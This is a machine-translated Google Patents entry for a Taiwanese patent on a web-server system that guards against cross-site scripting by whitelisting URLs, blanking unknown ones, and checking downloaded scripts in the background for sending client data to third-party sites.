TWI506471B - System and method for defending against cross-site scripting - Google Patents

Description

Cross-site attack prevention system and method

The present invention relates to a cross-site attack prevention system and method, and is particularly related to a cross-site attack prevention system and method that is installed in a web server to simplify the setup process and provide an effective defense mechanism.

With the rapid development and popularization of the Internet, web content has become more and more abundant. At the same time, the composition of web pages has evolved from an early static web page to a dynamic web page using a large number of dynamic web technologies. Due to the development of web technology, web applications are more diversified and provide more interactivity. However, it also creates security issues for various web systems, and increases the difficulty of computer protection systems to detect intrusions and security.

Cross-Site Scripting (XSS) is one of the most serious security weaknesses in the world. It is a typical web security vulnerability that can be exploited by attackers to steal user cookies or user data. The attack method of cross-site attack is usually that the attacker embeds malicious script parameters in the code of the webpage provided by the web server, and then uses social engineering techniques to attract webpage viewers to click. When the browser clicks, if the application provided by the web server does not filter the redundant code, the browser will execute the malicious script parameter code and transmit the victim's cookie to the attacker. Pre-established third-party websites, so attackers can steal private information about victims, such as online accounts, passwords, and even credit card numbers. Not only does it hurt the user's personal information security, but the impact of cross-site attacks can be said to have a major impact on people's livelihood, economy, and even national defense.

Based on the trend of interactive web applications today, the web architecture is more complex than before, and the technical difficulty and complexity of detecting cross-site attacks are increasing. Even experienced programmers are not easy to target. All kinds of code are completely filtered. In addition, from a user's point of view, the general public's perception of cross-site attacks is weaker, so it is extremely difficult to expect general users to discover or defend against cross-site attacks.

At present, the system erection for preventing cross-site attacks includes three configurations: setting on the client side, setting on the server side, and mixing on the client side and the server side. The method of setting up on the user side is too complicated for most network users to install and set up the prevention system. Most users cannot make judgments on cross-site attacks, so this solution is not easy to import into daily life. Life application. The method of mixing and setting on the client side and the server side is more complicated. In addition to the difficulty of setting the above-mentioned setting on the user side, the system set on the server side also needs to cooperate with the system of the user end, thereby multiplying the complexity.

In addition, the system set on the server side requires the programmer to take the time to set and test the firewall rules. Although it is less complicated than the above two methods, it is still not easy to set such a rule. The program developer must be experienced and Be cautious to set up a system with sufficient defense capabilities. Therefore, it is necessary to develop an easily configurable detection system with an efficient defense capability to cope with cross-site attacks that may occur at any time to minimize the harm.

Accordingly, one aspect of the present invention is to provide a cross-site attack prevention system that can be easily placed on a web server side and provides an effective defense capability to solve the problems of the prior art.

According to a specific embodiment, the cross-site attack prevention system of the present invention is set in a website server, wherein the website server is available for the user to log in and provide the webpage information to the client according to the requirements of the user. The cross-site attack prevention system includes a database, a filtering engine, a web crawler, and a script parameter detector.

In this embodiment, a whitelisted form is stored in the database, and at least one allowed webpage address is stored in the whitelisted form. The filtering engine is connected to the database, which can be used to compare the address of the to-be-checked webpage included in the webpage provided by the web server, and whether the allowed webpage address in the whitelisted table is the same, and can determine the webpage address. Whether the script parameter is included, and the blank character is used instead of the web address to be checked in the webpage data. The web crawler is connected to the filtering engine and database to read the web address to be checked and download the script parameters. The script parameter detector is connected to the web crawler to detect whether the script parameters downloaded by the web crawler contain the behavior of transmitting the data of the client to the third party website. Because the website attack defense system of the specific embodiment outputs the suspicious webpage address to be searched by blank characters, it can prevent the user from clicking the malicious code and causing the cross-site attack.

One aspect of the present invention is to provide a cross-site attack prevention method that is applied to a web server to effectively provide defense against cross-site attacks.

According to a specific embodiment, the cross-site attack prevention method of the present invention can first compare whether the webpage address to be inspected included in the webpage information provided by the web server is the same as the allowable webpage address stored in the whitelisted form. Then, according to the result of the comparison, the blank page character is used to replace the to-be-checked webpage address in the webpage data, and the script parameter is included in the webpage address to be checked. According to the result of the judgment, the script parameter of the webpage address to be checked is selectively downloaded. Finally, it is detected whether the downloaded script parameter has the function of transmitting the data of the client to the third-party website.

In this embodiment, the cross-site attack prevention method may use a blank character in the webpage of the webpage to be inspected when the ratio of the webpage address to the webpage address in the whitelisted table is different from the allowed webpage address. Instead, the webpage data replaced by the blank character is provided to the client, and the webpage address is further determined whether the script parameter is included in the webpage address to be checked. When it is determined that the webpage address to be checked includes the script parameter, the script parameter included in the webpage to be checked is downloaded in the background state, and the downloaded script parameter is detected whether there is a behavior of transmitting the data of the client to the third-party website. Because of the website attack prevention method in the specific embodiment, the suspicious webpage address to be inspected is first outputted as a blank character, thereby preventing the user from clicking a malicious code to cause a cross-site attack.

The advantages and spirit of the present invention will be further understood from the following detailed description of the invention.

Referring to FIG. 1, FIG. 1 is a schematic diagram of a cross-site attack defense system 1 according to an embodiment of the present invention. As shown in FIG. 1, the cross-site attack prevention system 1 is installed in the website server 2, and the website server 2 is available for the client 3 to log in. The web server 2 has an application 20 for the client 3 to log in. When the client 3 logs in to the application 20, the web server 2 is requested to browse the webpage, and the application 20 can request the webpage from the webpage according to the request. 22 takes out the corresponding webpage data and outputs it to the client 3.

In this embodiment, the cross-site attack prevention system 1 may include a database 10, a filtering engine 12, a web crawler 14, and a script parameter detector 16. A whitelisted form 100 is created in the database 10, and at least one allowed webpage address is stored in the whitelisted form 100. Please note that the allowed webpage address in the whitelisting table 100 is a webpage address that has been judged to have no cross-site attack, and the client 3 does not suffer from cross-site attacks when clicking on the allowed webpage address by using the browser. The allowable webpage address in the whitelist table 100 can be manually stored by the administrator of the web server 2, or can be automatically stored by the cross-site attack prevention system 1 of the specific embodiment, and the webpage will be allowed for the cross-site attack prevention system 1 The details of the address automatically stored in the whitelist form 100 are described in the following paragraphs.

The filtering engine 12 is connected to the repository 10, the web crawler 14 is connected to the filtering engine 12 and the repository 10, and the script parameter detector 16 is connected to the web crawler 14. The filtering engine 12 is further connected to the application 20 in this embodiment. However, in practice, the filtering engine 12 can also be directly disposed in the application 20, which is not limited by the present invention. The filtering engine 12 can compare whether the to-be-checked webpage address in the webpage data extracted from the application repository 22 by the application 20 is the same as the allowed webpage address stored in the whitelisted table 100 of the repository 10. In addition, the filtering engine 12 can also determine whether the web address to be checked contains script parameters, such as javascript. Moreover, the filtering engine 12 can also replace the to-be-checked webpage address in the webpage data with a blank character, so that the application 20 can output the webpage data replaced by the blank character to the client 3.

The web crawler 14 is connected to the filtering engine 12 and the database 10 to read the web address to be checked and download the script parameters included in the web address to be checked, for example, javascript. In this embodiment, the database 10 includes, in addition to the whitelist table 100, a temporary list 102 to be checked connected to the filtering engine 12 and the web crawler 14. The temporary list 102 to be checked may be self-checked. The filtering engine 12 receives and stores the address of the webpage to be inspected, and the web crawler 14 can read the webpage address of the webpage to be downloaded from the list to be checked to download the script parameters. Please note that the web crawler 14 can read the webpage address to be checked and download the script parameters, and can work in the background state, that is, the web crawler 14 does not affect the browsing and operation of the client 3 through the application 20. Web page.

The script parameter detector 16 is connected to the web crawler 14 and can detect the script parameters downloaded by the web crawler 14 and whether it includes the act of transmitting the data of the client to the third party website. In practice, the type of the script parameter detector 16 may vary according to the script parameters. For example, if the script parameter is javascript, the script parameter detector 16 may be a js-detector. Similarly, the action of the script parameter detector 16 can also operate in the background state without affecting the browsing and operation of the web page by the user. Since the malicious script parameters are usually coded to avoid detection, the script parameter detector 16 can first decode the script parameters, and then detect whether the decoded script parameters have the user-side data transmitted to the third-party website. the behavior of. In addition, in the case of malicious attacks, the script parameters usually transmit the private information of the client, for example, the cookie recorded on the client browser, to a third-party website for collection. However, the method of cross-site attack is changing with each passing day. In addition to the cookie, the attacker may also use other information of the user to attack. Therefore, the script parameter detector 16 of the specific embodiment can detect whether the script parameter has any user side. The behavior of the data transmitted to the third-party website, without limiting the type of the data, as a basis for judging whether the script parameter is a malicious script parameter.

The cross-site attack prevention system 1 described above can effectively prevent cross-site attacks according to certain processing procedures. Referring to FIG. 2, FIG. 2 is a flow chart showing the steps of a cross-site attack prevention method according to another embodiment of the present invention. The method of this embodiment can be implemented by using the website attack defense system 1 of FIG. 1. Please refer to FIG. 1 for details of the detailed process steps of the method of the specific embodiment.

As shown in FIG. 2, the cross-site attack prevention method in this embodiment includes the following steps: in step S40, comparing at least one of the to-be-checked webpage address included in the webpage data and the whitelisted table. Allowing the webpage addresses to be the same; then, in step S42, selectively replacing the to-be-checked webpage address with at least one blank character according to the comparison result of step S40, and determining whether the webpage address to be checked contains script parameters; And, in step S44, according to the determination result of step S42, the script parameter of the webpage address to be checked is selectively downloaded; finally, in step S46, it is detected whether the downloaded script parameter has the behavior of transmitting the data to the third-party website.

Taking the cross-site attack prevention system 1 of the above specific embodiment as an example, in step S40, the filtering engine 12 compares the to-be-checked webpage address included in the webpage data extracted by the application 20 with the whitelist of the database 10. Whether the allowed webpage addresses stored in the list table 100 are the same. Next, in step S42, the filtering engine 12 selectively replaces the to-be-checked webpage address in the webpage data with a blank character according to the result of the step S40, and determines whether the webpage address to be inspected contains any Script parameters. In practice, the application 20 can directly output the to-be-checked webpage address replaced by a blank character to the client 3, so that the client 3 can be prevented from clicking on malicious script parameters. Next, in step S44, according to step S42, it is determined whether the webpage address to be checked contains the result of the script parameter, and the web crawler 14 can read the webpage address to be checked and download its script parameter. In step S46, the script parameter detector 16 can detect the downloaded script parameters, and whether there is a behavior of transmitting the data of the user terminal to the third-party website. Similarly, the manner of performing the step S46 in the practice can be the script parameter detection. The detector 16 first decodes the script parameters and then detects whether there is a behavior of transmitting the data of the client to the third party website.

Please refer to FIG. 3, which is a flow chart showing the steps of the cross-site attack prevention method in FIG.

As shown in FIG. 3, after the filtering engine 12 compares the webpage address to be checked and the allowed webpage address stored in the whitelisting table, the result is YES in step S420. 20 will directly output the webpage data to the client 3, and the webpage address to be checked included in the webpage data outputted at this time has been confirmed as one of the allowed webpage addresses. If the result of the comparison in step S40 is no, that is, if any of the to-be-checked webpage address and the allowed webpage address of the whitelisted form is different, then the filtering engine 12 will treat the webpage data in step S422. The webpage address is replaced by a blank character, and the application 20 outputs the webpage data replaced by the blank character to the client 3, and then, in step S424, the filtering engine 12 further determines whether the webpage address to be checked is Contains script parameters.

When the result of the determination in step S424 is no, in step S440, it is determined that the webpage address to be inspected does not include a cross-site attack, and the webpage address to be inspected can be stored in the whitelisted table 100 as the allowed webpage address. Therefore, when the next time the filter engine 14 encounters the same webpage address to be checked, it can be compared with the allowed webpage address of the whitelisted table 100 via step S40, and directly output to the SMB in step S420. Client 3.

In addition, when the determination result in step S424 is YES, in step S442, the filtering engine 12 may store the to-be-checked webpage address in the to-be-checked list temporary storage table 102, and the webpage crawler 14 may self-check the list temporary storage form 102. Read the URL of the web page to be checked and download the script parameters. In practice, a webpage data may contain multiple webpage addresses to be inspected. Since the web crawler 14 reads and downloads the script parameters, the action is relatively time consuming. Therefore, the cross-site attack prevention system and method may be non-white. All the addresses of the to-be-checked webpages on the list form are replaced by blank characters and provided to the client 3, and then, after determining whether there are script parameters, the webpage addresses of the scripted parameters are stored in the list to be checked. The table 102 is saved, and the web crawler 14 can perform the actions of reading the webpage data to be inspected and downloading the script parameters in the background state. In other words, the user terminal 3 can obtain the webpage information after the filtering engine 12 confirms that the webpage address to be checked is the allowed webpage address, or replaces the webpage address to be inspected with a blank character, without waiting for the webpage crawler 14 to download the script parameter. And delay the response speed of the application 20.

After step S442 or after the script parameter, in step S46, the script parameter detector 16 can detect the downloaded script parameter and whether there is a behavior of transmitting the data of the client to the third party website. When the result of the detection in step S46 is NO, the method of the specific embodiment returns to step S440, and stores the to-be-checked webpage address as the allowed webpage address in the whitelisted table 100. In addition, when the result of the detection in step S46 is YES, in step S48, the website address to be checked is determined to be a malicious code containing a cross-site attack. Similarly, the script parameter detector 16 detects whether the downloaded script parameter has an action of transmitting data behavior, and can also be executed in the background state without affecting the speed at which the application 20 responds to the client 3.

In addition, in order to speed up the comparison speed of the cross-site attack prevention system 1 and method of the above specific embodiment, each allowed webpage address is encoded to obtain a hash value, and each hash value is stored in the whitelist table 100. Medium, corresponding to the hash bar of each allowed web page address. When the filtering engine 12 compares the address of the webpage, it first encodes the address of the webpage to be checked to obtain the hash value to be checked, and then searches for the hash value of the webpage address to be searched to search for the whitelisted table 100. The hash value that is matched, thereby speeding up the comparison of the web address to the allowed web address.

In summary, the cross-site attack prevention system and method of the present invention compares the address of the webpage to be checked in the webpage data outputted by the web server, and whether the webpage address in the whitelisted table of the database is the same. If the address of the webpage to be checked is not the allowed webpage address, the system will replace the webpage address of the webpage in the webpage data with a blank character and output it to the client to avoid the malicious end of the client. By comparing the URL of the to-be-checked webpage with the allowed webpage address in the whitelisted form, the script parameter can be downloaded in the background state, and the script parameter is detected whether the data of the client is transmitted to the third party. The behavior of the website, if the information of the webpage address to be checked does not contain the script parameter, or the script parameter does not include the behavior of transmitting the data of the client to the third party website, the webpage address to be checked may be used as the allowed webpage address. The address is then stored in the whitelist form and can be accessed normally when the client reads it next time. Compared with the prior art, the cross-site attack prevention system and method of the present invention is established on the server server side, can be simply set up without setting and testing firewall rules, and can effectively prevent the user terminal from being attacked by malicious code. .

The features and spirit of the present invention will be more apparent from the detailed description of the preferred embodiments. On the contrary, the intention is to cover various modifications and equivalents within the scope of the invention as claimed. Therefore, the scope of the patented scope of the invention should be construed as broadly construed in the

1. . . Cross-site attack prevention system

10. . . database

12. . . Filter engine

14. . . Web crawler

16. . . Script parameter detector

100. . . Whitelist form

102. . . Temporary list of pending lists

2. . . Website server

20. . . application

122. . . Application database

3. . . user terminal

S40~S48. . . Process step

FIG. 1 is a schematic diagram showing a cross-site attack prevention system according to an embodiment of the present invention.

FIG. 2 is a flow chart showing the steps of a cross-site attack prevention method according to another embodiment of the present invention.

Figure 3 is a flow chart showing the steps of the cross-site attack prevention method in Figure 2.

1. . . Cross-site attack prevention system

10. . . database

12. . . Filter engine

14. . . Web crawler

16. . . Script parameter detector

100. . . Whitelist form

102. . . Temporary list of pending lists

2. . . Website server

20. . . application

122. . . Application database

3. . . user terminal

Claims (10)

A cross-site attack prevention system is provided in a website server, the website server can be used for a user to log in, and a webpage information is provided to the user end according to the request of the user end, the cross-site attack prevention system The method includes: a database storing a whitelist table, the whitelist table storing at least one allowed webpage address; a filtering engine connected to the database, the filtering engine is used to compare the webpage data One of the to-be-checked webpage addresses included in the whitelisted table is the same as the at least one allowed webpage address in the whitelisted form. If the comparison result is the same, the webpage data is directly connected by the application connected to the filtering engine. Outputting to the client; if the comparison result is different, the filtering engine replaces the to-be-checked webpage address in the webpage data with at least one blank character, and further determines whether the to-be-checked webpage address contains a script a web crawler, which is connected to the filter engine and the database, the web crawler is when the filter engine determines that the web address to be checked contains the script a time interval for reading the web page address to be downloaded to download the script parameter; and a script parameter detector connected to the web crawler for detecting the script parameter downloaded by the web crawler, Whether it includes the transmission of one of the data of the client to a third-party website. The cross-site attack prevention system of claim 1, wherein the database further comprises a pending list temporary storage form, which is connected to the filtering engine and the web crawler, and the pending list temporary table is For storing the address of the web page to be inspected, and the web crawler is temporarily stored from the list to be checked The form reads the to-be-checked web address to download the script parameters. The cross-site attack defense system of claim 1, wherein the script parameter detector detects that the script parameter does not include the act of transmitting the data of the client to the third-party website, The web crawler will store the to-be-checked webpage address in the whitelisted form. The cross-site attack prevention system of claim 1, wherein the whitelist table further stores a hash value corresponding to the at least one allowed webpage address, and the filtering engine is configured according to the Querying a hash value corresponding to the webpage address to compare the hash value corresponding to the at least one allowed webpage address, to compare whether the webpage address to be checked and the at least one allowed webpage address are the same. The cross-site attack prevention system described in claim 1, wherein the script parameter detector is configured to decode the script parameter, and detect the decoded script parameter, whether the user terminal is included The act of transmitting the data to this third party website. A cross-site attack prevention method is provided for a website server, wherein the website server can be used by a client to log in, and a webpage data is provided to the client according to the request of the client. The method comprises the following steps: (a Whether the address of the web page to be inspected included in the webpage data is the same as the at least one webpage address stored in the whitelisting form; (b) if the webpage address to be inspected is stored in the whitelist The comparison result of the at least one allowed webpage address is different, the at least one blank character is used to replace the to-be-checked webpage address, and it is determined whether the to-be-checked webpage address contains a script parameter; (c) Whether the script parameter is included according to the judgment of the address of the webpage to be checked As a result of the determination, the script parameter of the to-be-checked webpage address is selectively downloaded; and (d) detecting whether the downloaded script parameter has a behavior of transmitting the data of one of the client terminals to a third-party website. The cross-site attack prevention method described in claim 6 , wherein the step (b) further comprises the following steps: (b1) if the address of the to-be-checked webpage in the step (a) and the whitelist are stored at least one If the comparison result of the webpage address is the same, the webpage data including the address of the webpage to be inspected is provided to the client. The method for preventing cross-site attack as described in claim 6 , wherein the step (c) further comprises the following steps: (c1) if it is determined whether the result of the script parameter is not included in the website address to be checked, The web page address to be checked is stored in the white list form. The cross-site attack prevention method described in claim 6 , wherein the step (c) further comprises the following steps: (c2) downloading the result if the result of determining whether the web page address to be checked includes the script parameter is The script parameter of the web page address to be checked. The cross-site attack prevention method described in claim 6 further includes the following steps: (e1) if the script parameter detected in the step (d) is downloaded, the data of the client is transmitted to the third party. The behavior of the website, determining that the address of the web page to be inspected is a cross-site attack; and (e2) if the script parameter detected in step (d) does not transmit the data of the client to the third party website And storing the to-be-checked webpage address in the whitelisted form.